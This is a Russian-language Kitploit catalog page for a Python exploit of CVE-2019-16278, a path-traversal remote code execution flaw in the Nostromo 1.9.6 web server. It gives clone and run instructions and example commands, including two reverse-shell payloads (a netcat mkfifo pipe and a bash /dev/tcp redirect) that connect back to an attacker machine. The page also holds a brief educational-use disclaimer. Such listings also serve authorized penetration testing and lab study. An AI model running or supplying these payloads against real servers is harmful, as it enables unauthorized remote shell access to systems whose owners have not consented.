Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution — 未经身份验证的攻击者可以强制服务器指向诸如'/bin/sh'之类的shell文件并执行任意命令,因为未能验证URL,导致路径遍历到系统中存在的任何文件。Nostromo的1.9.6等版本未能验证此URL | Kitploit
Инструменты/GitHubGitHub/cybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubcybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution

CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

未经身份验证的攻击者可以强制服务器指向诸如'/bin/sh'之类的shell文件并执行任意命令,因为未能验证URL,导致路径遍历到系统中存在的任何文件。Nostromo的1.9.6等版本未能验证此URL

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC

Репозиторий: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git

📜 Описание

Этот репозиторий содержит эксплойт на Python для CVE-2019-16278 — уязвимости в Nostromo 1.9.6 (веб-сервер). Уязвимость позволяет выполнять удалённый код (RCE) путём эксплуатации обхода каталогов для выполнения произвольных команд на целевой системе.

🚀 Возможности

  • Выполнение пользовательских команд оболочки на уязвимой цели.
  • Поддержка полезных нагрузок для обратной оболочки.
  • Возможность настройки размера ответа от цели.

🛠️ Требования

  • Python 3.x
  • Машина, работающая под управлением Nostromo 1.9.6 (уязвимая цель).
  • Netcat (nc) для перехвата обратных оболочек.

⚙️ Использование

Шаг 1: Клонирование репозитория

root@kitploit:~
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Шаг 2: Запуск эксплойта

root@kitploit:~
python3 CVE-2019-16278.py -t <ЦЕЛЕВОЙ_IP> -p <ПОРТ> -c "<КОМАНДА>" [-b <БАЙТ_ДЛЯ_ЧТЕНИЯ>]

Аргументы:

АргументОписаниеОбязательныйПо умолчанию
-t, --targetIP-адрес целиДаНет
-p, --portПорт целиДаНет
-c, --commandКоманда для выполнения на сервереДаНет
-b, --bytesКоличество байт для чтения в ответеНет4096

🧑‍💻 Примеры

Пример 1: Выполнение whoami на цели

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

Пример 2: Обратная оболочка с Netcat

Шаг 1: Запустите слушатель Netcat на вашей атакующей машине:

root@kitploit:~
nc -lvnp 443

Шаг 2: Выполните эксплойт с полезной нагрузкой обратной оболочки:

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

Пример 3: Обратная оболочка через /dev/tcp

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 Детали уязвимости

  • CVE: CVE-2019-16278
  • Затронутое ПО: Веб-сервер Nostromo 1.9.6
  • Тип: Обход каталогов -> Удалённое выполнение кода

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных целей. Не используйте его в системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Несанкционированный доступ к системам незаконен. Используйте ответственно.

Скачать инструмент